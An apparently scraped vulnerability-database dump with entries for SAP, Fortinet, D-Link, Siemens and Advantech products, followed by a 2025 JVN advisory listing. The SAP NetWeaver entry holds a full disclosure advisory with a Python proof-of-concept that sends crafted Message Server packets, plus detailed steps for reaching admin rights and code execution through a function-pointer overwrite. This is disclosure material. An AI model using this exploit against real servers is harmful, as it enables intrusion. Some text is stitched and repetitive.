VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201103-0371	SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-201706-0017	In FortiClientWindows 5.4.1 and 5.4.2, an attacker may escalate privilege via a FortiClientNamedPipe vulnerability. fortinet's Windows for FortiClient contains vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiClient is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges. FortiClient 5.4.1 and 5.4.2 are vulnerable. Fortinet FortiClient is a mobile terminal security solution developed by Fortinet. The solution provides IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication when connected to FortiGate firewall appliances
var-202305-1520	D-Link DIR-2150 SetSysEmailSettings EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20556. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202407-0490	A vulnerability has been identified in SIMATIC PCS neo V4.0 (All versions), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions < V18 Update 2). Affected applications do not properly restrict the .NET BinaryFormatter when deserializing user-controllable input. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300. SIMATIC PCS neo is a distributed control system (DCS). SIMATIC STEP 7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. Totally Integrated Automation Portal (TIA Portal) is a PC software that provides the full range of Siemens digital automation services, from digital planning, integrated engineering to transparent operation
var-201810-0396	Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-202001-0833	A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. Vulnerability Information Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. Vulnerable packages . Older versions are probably affected too, but they were not checked. 5. Non-vulnerable packages . Vendor did not provide this information. 6. Vendor Information, Solutions and Workarounds SAP released the security note 1800603 [2] regarding these issues. 7. Credits Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. Technical Description / Proof of Concept Code The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '39 server_name = '-'+' '39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[] Conected, sending login request" init = 'MESSAGE\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. Gaining remote code execution by overwriting function pointers Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '(20-4) crash+= "LOLO" + ' '(40-4) crash+= " "36 send_packet(connection, crash) print "[] Crash sent !" -----/ 9. Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. References [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. About CoreLabs CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. Disclaimer The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
jvndb-2025-008145	Epson Web Installer for Mac vulnerable to missing authentication for critical function	2025-07-08T14:08+09:00	2025-07-08T14:08+09:00
jvndb-2025-008106	Heap-based buffer overflow vulnerability in V-SFT and TELLUS	2025-07-07T16:26+09:00	2025-07-07T16:26+09:00
jvndb-2025-008105	Windows shortcut following (.LNK) vulnerability in Trend Micro Security for Windows (CVE-2025-52521)	2025-07-07T16:04+09:00	2025-07-07T16:04+09:00
jvndb-2025-000047	Multiple vulnerabilities in Nimesa Backup and Recovery	2025-07-07T15:26+09:00	2025-07-07T15:26+09:00
jvndb-2025-007978	Multiple vulnerabilities in Trend Micro Password Manager for Windows (CVE-2025-48443, CVE-2025-52837)	2025-07-04T13:28+09:00	2025-07-04T13:28+09:00
jvndb-2025-000045	Multiple vulnerabilities in Active! mail	2025-07-02T14:13+09:00	2025-07-02T14:13+09:00
jvndb-2025-007754	Multiple vulnerabilities in Contec CONPROSYS HMI System (CHS)	2025-07-02T11:31+09:00	2025-07-02T11:31+09:00
jvndb-2025-007607	Pass-Back Attack vulnerability in Konica Minorta bizhub series	2025-07-01T14:09+09:00	2025-07-01T14:09+09:00
jvndb-2025-007595	Multiple vulnerabilities in Web Connection of Konica Minolta MFPs	2025-07-01T14:02+09:00	2025-07-01T14:02+09:00
jvndb-2025-000046	SLNX Help Documentation of RICOH Streamline NX vulnerable to reflected cross-site scripting	2025-06-30T15:45+09:00	2025-06-30T15:45+09:00
jvndb-2025-007552	Multiple vulnerabilities in TB-eye network recorders and AHD recorders	2025-06-30T14:45+09:00	2025-06-30T14:45+09:00
jvndb-2024-004595	Multiple vulnerabilities in FutureNet NXR series, VXR series and WXR series	2024-07-29T17:51+09:00	2025-06-30T09:56+09:00
jvndb-2025-007521	Multiple Brother driver installers for Windows vulnerable to privilege escalation	2025-06-27T09:37+09:00	2025-06-27T09:37+09:00
jvndb-2025-007519	Multiple vulnerabilities in multiple BROTHER products	2025-06-26T18:15+09:00	2025-06-26T18:15+09:00
jvndb-2025-000043	Multiple vulnerabilities in iroha Board	2025-06-26T15:13+09:00	2025-06-26T15:13+09:00
jvndb-2025-000044	Denial-of-service (DoS) vulnerabilities in multiple Apache products	2025-06-26T14:41+09:00	2025-06-26T14:41+09:00
jvndb-2025-000042	Inefficient regular expressions in GROWI	2025-06-24T15:25+09:00	2025-06-24T15:25+09:00
jvndb-2025-000041	Multiple vulnerabilities in ELECOM wireless LAN routers	2025-06-24T14:50+09:00	2025-06-24T14:50+09:00
jvndb-2025-007390	Trend Micro Internet Security and Trend Micro Maximum Security vulnerable to link following local privilege escalation (CVE-2025-49384, CVE-2025-49385)	2025-06-24T11:18+09:00	2025-06-24T11:18+09:00
jvndb-2025-000040	KCM3100 vulnerable to authentication bypass using an alternate path or channel	2025-06-18T13:42+09:00	2025-06-18T13:42+09:00
jvndb-2025-000039	Multiple vulnerabilities in RICOH Streamline NX PC Client	2025-06-13T16:09+09:00	2025-06-13T16:09+09:00
jvndb-2025-000038	UpdateNavi vulnerable to improper restriction of communication channel to intended endpoints	2025-06-12T15:56+09:00	2025-06-12T15:56+09:00
jvndb-2025-000037	Multiple surveillance cameras provided by i-PRO Co., Ltd. vulnerable to cross-site request forgery	2025-06-06T13:56+09:00	2025-06-06T13:56+09:00
jvndb-2025-000036	TimeWorks vulnerable to path traversal	2025-06-03T15:35+09:00	2025-06-03T15:35+09:00
